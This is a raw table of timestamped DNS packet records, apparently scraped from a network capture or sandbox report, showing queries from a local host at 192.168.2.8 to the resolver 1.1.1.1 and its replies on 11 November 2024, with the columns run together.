                                                                                                                                                                                                              Nov 11, 2024 18:33:38.191564083 CET53642321.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:38.191575050 CET53611071.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:38.193352938 CET53538301.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:38.193362951 CET53633031.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:38.194156885 CET53617671.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:38.194196939 CET5628553192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:38.194384098 CET5121453192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:38.194643021 CET5261953192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:38.194830894 CET53501901.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:38.195766926 CET53585121.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:38.196255922 CET5077453192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:38.196443081 CET5585653192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:38.196665049 CET6467853192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:38.196824074 CET6278953192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:38.197339058 CET5770253192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:38.199991941 CET5502253192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:38.200160027 CET5084053192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:38.200331926 CET6162453192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:38.200562000 CET6190753192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:38.200715065 CET6249853192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:38.200860023 CET5033753192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:38.201014042 CET5258153192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:38.201174021 CET5736353192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:38.201335907 CET6212853192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:38.202939987 CET53562851.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:38.207062960 CET53512141.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:38.207073927 CET53646781.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:38.207078934 CET53526191.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:38.208044052 CET53558561.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:38.208074093 CET53507741.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:38.211611032 CET53503371.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:38.211904049 CET53567601.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:38.212069035 CET53573631.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:38.216240883 CET6441953192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:38.217331886 CET5473653192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:38.217518091 CET5762753192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:38.220077038 CET53624981.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:38.221247911 CET53550221.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:38.222184896 CET53606901.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:38.226862907 CET53644191.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:38.230772018 CET53627891.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:38.231581926 CET53508401.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:38.231592894 CET53577021.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:38.233602047 CET53619071.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:38.233612061 CET53616241.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:38.233617067 CET53621281.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:38.234693050 CET53525811.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:38.234724045 CET5412253192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:38.234750032 CET53547361.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:38.245105028 CET53541221.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:38.250077963 CET53576271.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:43.790111065 CET6039453192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:43.791604996 CET5811753192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:43.795953035 CET5668353192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:43.801203012 CET53581171.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:43.801776886 CET53603941.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:43.802401066 CET5069053192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:43.805757046 CET6176353192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:47.846118927 CET5608253192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:47.848443985 CET6298253192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:47.848923922 CET5576253192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:47.850344896 CET5316853192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:47.850866079 CET53610841.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:47.851778030 CET53514911.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:47.853105068 CET53492191.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:47.853879929 CET5372153192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:47.855936050 CET53604241.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:47.856895924 CET53560821.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:47.861345053 CET53557621.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:47.861938953 CET53531681.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:47.865847111 CET53537211.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:47.866605043 CET53578261.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:47.871943951 CET6262953192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:47.874391079 CET53495051.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:47.875507116 CET5731553192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:47.875677109 CET53599951.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:47.877295017 CET6054153192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:47.879067898 CET5240753192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:47.879884005 CET53629821.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:47.881743908 CET53626291.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:47.885425091 CET5875253192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:47.887218952 CET6110653192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:47.887995005 CET53605411.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:47.889014006 CET53524071.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:47.892112017 CET5320253192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:47.892281055 CET5221053192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:47.893557072 CET5083853192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:47.893851042 CET6071653192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:47.895704031 CET53587521.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:47.896544933 CET6025253192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:47.896743059 CET4981253192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:47.897435904 CET53611061.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:47.900238991 CET5430853192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:47.900687933 CET4999753192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:47.901623964 CET5275253192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:47.902024031 CET6476753192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:47.902736902 CET53508381.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:47.903093100 CET53532021.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:47.906903982 CET53573151.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:47.908076048 CET53602521.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:47.908679008 CET53498121.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:47.910181046 CET53543081.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:47.910362005 CET53522101.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:47.912228107 CET53647671.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:47.916573048 CET5927153192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:47.917130947 CET5996553192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:47.917305946 CET5203553192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:47.917447090 CET5171553192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:47.917582035 CET5387653192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:47.917731047 CET5467053192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:47.917865038 CET4970453192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:47.921768904 CET6259053192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:47.921964884 CET4966053192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:47.922192097 CET5341753192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:47.922339916 CET4915853192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:47.922532082 CET5913253192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:47.922674894 CET5712553192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:47.922821045 CET6042553192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:47.922965050 CET6219553192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:47.923110008 CET5314253192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:47.923284054 CET6367553192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:47.923325062 CET6181053192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:47.923454046 CET5500353192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:47.926240921 CET53607161.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:47.926603079 CET6039353192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:47.927000046 CET5930953192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:47.927174091 CET6522853192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:47.927357912 CET5673553192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:47.927537918 CET5255653192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:47.927704096 CET4966253192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:47.927731037 CET53517151.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:47.927879095 CET53538761.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:47.927916050 CET53599651.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:47.928877115 CET53546701.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:47.929182053 CET4992153192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:47.931615114 CET53499971.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:47.932383060 CET53496601.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:47.932394981 CET53591321.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:47.932914972 CET53534171.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:47.932934046 CET53636751.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:47.933028936 CET53527521.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:47.933346987 CET53621951.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:47.933357954 CET53571251.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:47.933526993 CET53618101.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:47.935230970 CET53567351.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:47.936065912 CET53652281.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:47.937158108 CET53603931.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:47.938081026 CET53593091.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:47.941035032 CET53625901.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:47.945770979 CET53496621.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:47.947479010 CET53592711.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:47.948695898 CET53520351.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:47.951378107 CET53497041.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:47.953634977 CET53531421.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:47.954309940 CET53491581.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:47.955837965 CET53604251.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:47.955866098 CET53550031.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:47.961011887 CET53525561.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:47.962141037 CET53499211.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:50.352845907 CET5255053192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:50.362781048 CET53525501.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:50.438169956 CET5606653192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:52.647541046 CET53494001.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:52.651223898 CET5071353192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:52.656459093 CET53638431.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:52.661052942 CET53507131.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:52.665055990 CET53617151.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:52.677130938 CET5366353192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:52.709062099 CET53536631.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:52.718178034 CET6357653192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:52.748466015 CET5166853192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:52.751360893 CET53635761.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:52.758032084 CET53516681.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:52.766243935 CET5866353192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:52.767235994 CET5454553192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:52.767908096 CET4953753192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:52.770308018 CET6121653192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:52.770662069 CET5967353192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:52.772783995 CET5131153192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:52.776225090 CET6342553192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:52.777190924 CET4952153192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:52.778366089 CET5807353192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:52.779584885 CET53545451.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:52.780479908 CET53612161.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:52.780636072 CET6163453192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:52.780695915 CET53596731.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:52.784172058 CET53513111.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:52.786668062 CET53634251.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:52.788484097 CET53495211.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:52.797776937 CET53586631.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:52.798736095 CET53495371.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:52.800007105 CET53616341.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:52.803929090 CET6113253192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:52.804111958 CET5160253192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:52.804279089 CET6045953192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:52.804447889 CET4941753192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:52.804913044 CET5364753192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:52.805964947 CET5911753192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:52.806129932 CET5783253192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:52.809253931 CET53580731.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:52.813553095 CET53536471.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:52.814667940 CET53494171.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:52.814678907 CET53604591.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:52.816464901 CET53591171.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:52.817399979 CET6360953192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:52.821626902 CET53611321.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:52.825318098 CET5639353192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:52.826069117 CET6032753192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:52.826222897 CET6516553192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:52.826384068 CET6119153192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:52.826529980 CET6207053192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:52.826680899 CET6424653192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:52.826821089 CET5998453192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:52.826981068 CET5030353192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:52.827120066 CET5078353192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:52.827286005 CET6005253192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:52.827425957 CET53636091.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:52.827455044 CET6286853192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:52.828109980 CET6162053192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:52.828268051 CET5767353192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:52.828433990 CET5803253192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:52.830014944 CET5467353192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:52.830384016 CET5478653192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:52.831708908 CET5741353192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:52.834485054 CET53516021.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:52.835766077 CET53651651.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:52.835787058 CET53563931.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:52.836493015 CET53616201.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:52.836503983 CET53620701.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:52.836626053 CET53642461.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:52.837712049 CET53576731.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:52.838587046 CET53578321.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:52.838598013 CET53628681.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:52.842024088 CET53574131.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:52.848102093 CET53580321.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:52.853420973 CET5373253192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:52.857914925 CET53503031.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:52.857960939 CET53603271.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:52.858632088 CET53611911.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:52.858664989 CET53599841.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:52.859206915 CET53600521.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:52.859261990 CET53507831.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:52.861439943 CET6093253192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:52.861527920 CET53547861.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:52.861593008 CET53546731.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:52.861692905 CET5984953192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:52.863432884 CET5090453192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:52.863595009 CET5176253192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:52.864159107 CET5766753192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:52.864332914 CET5822153192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:52.864695072 CET6490253192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:52.864861965 CET6264353192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:52.868875980 CET53609321.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:52.871301889 CET5299753192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:52.872353077 CET5160453192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:52.872519970 CET5643953192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:52.872664928 CET5299053192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:52.872806072 CET4977053192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:52.872944117 CET6095153192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:52.873269081 CET6135853192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:52.873277903 CET53598491.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:52.873294115 CET53509041.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:52.873306036 CET53576671.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:52.873563051 CET53517621.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:52.873889923 CET53626431.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:52.875041962 CET53649021.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:34:04.120722055 CET5188853192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:34:04.120997906 CET5611553192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:34:04.121167898 CET6328153192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:34:04.121611118 CET5890653192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:34:04.121794939 CET5112753192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:34:04.124286890 CET5308553192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:34:04.124547958 CET5564353192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:34:04.124799013 CET5917453192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:34:04.124964952 CET5228753192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:34:04.125344992 CET5145253192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:34:04.125513077 CET6158653192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:34:04.129712105 CET53632811.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:34:04.130954027 CET53596561.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:34:04.131511927 CET53561151.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:34:04.131894112 CET53589061.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:34:04.134776115 CET53514521.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:34:04.134795904 CET53591741.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:34:04.146256924 CET6250353192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:34:04.148139000 CET4942353192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:34:04.148644924 CET6145953192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:34:04.148873091 CET5447653192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:34:04.149293900 CET6270953192.168.2.81.1.1.1
